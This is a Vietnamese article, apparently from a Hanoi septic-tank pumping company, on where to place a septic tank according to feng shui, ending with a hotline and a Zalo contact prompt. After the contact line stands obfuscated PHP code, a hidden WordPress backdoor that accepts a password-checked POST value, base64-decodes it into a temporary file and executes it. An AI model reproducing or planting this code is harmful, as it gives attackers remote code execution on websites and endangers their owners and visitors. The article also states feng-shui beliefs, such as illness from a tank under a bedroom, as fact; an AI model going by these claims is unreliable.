Vị trí đặt bể phốt trong nhà hợp phong thủy, tốt cho gia chủ

Vị trí đặt bể phốt trong nhà sao cho mang lại nhiều tài lộc và những điều tốt đẹp nhất cho gia chủ luôn là mong muốn của bất cứ ai khi bắt đầu thiết kế, xây dựng công trình bể phốt. Vậy bể phốt nên đặt ở đâu, cách đặt bể phốt như thế nào, vị trí đặt bể phốt trong nhà ống tối ưu nhất? Tất cả sẽ được chia sẻ trong bài viết dưới đây.

Hút bể phốt Hà Nội uy tín

Hút bể phốt Hà Nội uy tín

Những điều cấm kỵ khi chọn vị trí đặt bể phốt trong nhà phố

Trong văn hóa tín ngưỡng Á Đông nói chung và tín ngưỡng Việt Nam nói riêng rất coi trọng phong thủy. Người ta cho rằng nước là khởi nguồn cho sự sống, là biểu tượng của sự may mắn và tài lộc. Nước phải chảy thường xuyên và đều đặn thì mới đem lại sự thịnh vượng cho gia chủ.

Xem thêm: Dịch vụ hút bể phốt uy tín tại hà nội

Các nhà phong thủy học quan niệm rằng, bể phốt chính là nơi nước hội tụ, tuy nhiên dòng nước chảy phải thông thoáng, phải có ra có vào, vào nhiều hơn ra và luôn có một lượng nước nhất định trong bể phốt thì mới gọi là tốt được.

Với thực tế xây dựng nhà ở tại các thành phố, đô thị hiện nay, thường diện tích đất khá nhỏ hẹp nên phần móng của ngôi nhà sẽ được tận dụng xây bể phốt. Bởi vậy trong quá trình xây dựng, gia chủ cần đặc biệt chú ý đến vị trí đặt bể phốt theo phong thủy để hạn chế tối đa những vấn đề xấu ảnh hưởng tới sức khỏe, tài lộc, tình cảm, … của tất cả các thành viên trong gia đình.

Sau đây là những điều đại kỵ mà các nhà phong thủy khuyên bạn cần tránh khi chọn vị trí đặt bể phốt trong nhà phố:

Không được đặt bể phốt phía sau nhà

Phía sau của mỗi ngôi nhà thường được gọi là “Sơn thủ” có nghĩa là phần lưng của ngôi nhà. Đối xứng với phần Sơn thủ lại chính là hướng nhà.

Không được đặt bể phốt ở khu vực phòng bếp và phòng thờ

Trong không gian của toàn bộ ngôi nhà, phòng thờ và phòng bếp được coi là 2 nơi thiêng liêng nhất, cao quý nhất. Đây là hai khu vực đại diện cho hành hỏa, còn ngược lại, bể phốt lại đại diện cho hành thủy.

Theo quy luật tương sinh tương khắc trong phong thủy thì Thủy khắc Hỏa. Khi đã tương khắc như vậy sẽ cản trở sự phát triển của nhau, nếu thái quá sẽ dẫn đến sự suy vong, hủy diệt. Nước sẽ dập tắt lửa.

Do đó một trong những điều tối kỵ nhất và vô cùng nguy hiểm trong việc tìm vị trí đặt bể phốt trong nhà đó chính là đặt bể phốt dưới nền bếp và phòng thờ. Bạn cần tuyệt đối tránh điều này nếu như muốn gia đình gặp được mọi điều may mắn.

Không đặt bể phốt dưới phòng ngủ

Xét theo phong thủy, phòng ngủ và bể phốt đều mang tính âm. Nếu chúng kết hợp với nhau sẽ gây nên những ảnh hưởng vô cùng xấu đến sức khỏe các thành viên trong gia đình và có thể dẫn đến việc mắc các bệnh nguy hiểm về đường huyết.

Không đặt bể phốt tại vị trí giữa nhà

Khu vực giữa nhà thường được gọi là trung cung – nơi hội tụ của 8 phương cần phải vững mạnh, không được phép suy. Trung cung giữa nhà thuộc hành Thổ, Thổ tương khắc Thủy sẽ tạo nên những điều không tốt.

Hơn nữa theo khoa học thì bể phốt là nơi chứa đựng các chất thải, trong qáu trình phân hủy sẽ tồn tại rất nhiều vi khuẩn gây bệnh nên việc đặt bể phốt ở vị trí giữa nhà là hoàn toàn không nên.

Không đặt bể phốt ở hướng hung

Tùy thuộc vào mỗi gia đình sẽ có hướng hung khác nhau. Để xác định chính xác hướng hung, bạn cần có la bàn để xác định và căn cứ vào nguyên tắc:

  • Gia chủ thuộc đông tứ mệnh thì hướng hung sẽ được xác định là hướng thuộc nhóm Tây tứ trạch.
  • Gia chủ thuộc tây tứ trạch thì vị trí đặt bể phốt sẽ tại các hướng thuộc đông, đông nam, chính nam và chính bắc.

Bể phốt nên đặt ở đâu khi xây nhà?

Bể phốt nên đặt ở đâu khi xây nhà – Tốt nhất bạn nên xây đằng trước hay đằng sau nhà nhằm tiện cho việc khắc phục sự cố. Nếu xây dựng bể phốt ở gầm cầu thang, bạn nên đặt công trình sát tường và thẳng từ nhà vệ sinh xuống. Bạn có thể tận dụng dầm giữa nhà bằng cách đặt ngăn to nhất của bể phốt ở 1 bên và 2 ngăn nhỏ ở một bên dầm.

Theo lời khuyên của các chuyên gia thì vị trí đặt bể phốt tốt nhất là trên các thiên can: Nhâm, Tân, Quý, Giáp, Ất, Bính, Canh, Đinh. Lí giải điều này rất đơn giản vì theo phong thủy thì mọi dòng nước đều phải đi theo thiên can. Tuy nhiên đối với thiên can Mậu và Kỷ thì bạn không nên đặt bể phốt bể phốt tại đây bởi 2 thiên can này thuộc ngũ hành Thổ, trong khi Thổ lại khắc Thủy.

Trong trường hợp không còn khu vực nào để đặt bể phốt mà bắt buộc phải đặt ở giữa phòng khách thì bạn cần xem xét thật kỹ vị trí phòng khách trong tổng thể kiến trúc của ngôi nhà để từ đó biết được các hướng có lợi và bất lợi.

Có nên xây bể nước ngầm không

Điều này được thể hiện cụ thể như sau: Khi bạn chia chiều dài ngôi nhà thành 3 phần, nếu như phòng khách nằm thiên về phía trước hoặc phía sau thì có thể đặt bể phốt ở giữa nhà. Còn nếu phòng khách nằm ở chính giữa ngôi nhà thì việc đặt bể phốt tại vị trí này là hoàn toàn không nên. Bể phốt lại nằm ở vị trí đại kỵ Trung cung như đã giới thiệu với các bạn ở phía trên.

Ngoài ra, nếu bể phốt quá rộng và bao trùm toàn bộ chiều dài nền nhà sẽ làm đứt trạch nhà, điều này cực kỳ gây hại cho gia chủ. Để khắc phục, bạn có thể lấp một phần của bể phốt đi, thu hẹp diện tích bể phốt lại để không rộng hơn ngôi nhà của chính bạn.

Video: Hướng dẫn vị trí bể phốt giữa nhà

Video dưới đây sẽ hướng dẫn cho bạn vị trí bể phốt giữa nhà.

Hướng dẫn cách đặt bể phốt ngoài nhà cho gia chủ

Đối với những gia đình có diện tích rộng và có khu đất trống trước nhà, tốt nhất bạn nên đặt bể phốt tại khu vực đất đó, vừa đảm bảo vệ sinh lại vừa hợp phong thủy.

Còn đối với những gia đình sống trong các ngóc ngách, có diện tích nhỏ hẹp thì việc đặt bể phốt hợp lý với phong thủy sẽ khá khó khăn. Điều bạn có thể làm được ở đây đó chính là đặt bể phốt ngoài nhà cho giảm thiểu được tối đa luồng khí xấu ảnh hưởng đến gia đình mà thôi.

Nên đặt bể phốt dưới gầm cầu thang để hạn chế ác xạ và xung sát cho gia đình.

Xem thêm: 5 cách thông bể phốt tại nhà hiệu quả nhất, bạn nên biết

Với toàn bộ nội dung thông tin trong bài viết mà hutbephot-urenco chia sẻ, hy vọng các bạn đã biết và xác định được vị trí đặt bể phốt trong nhà. Ngoài ra, trong quá trình sử dụng bể phốt, nếu cần được hỗ trợ xử lý các sự cố thông tắc bể phốt, hút bể phốt, …uy tín, chất lượng, hợp phong thủy, bạn có thể liên hệ đến số hotline của chúng tôi 0942 250 111.

Nguyễn Ngọc Hải

Gọi Ngay

Contact Me on Zalo
if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}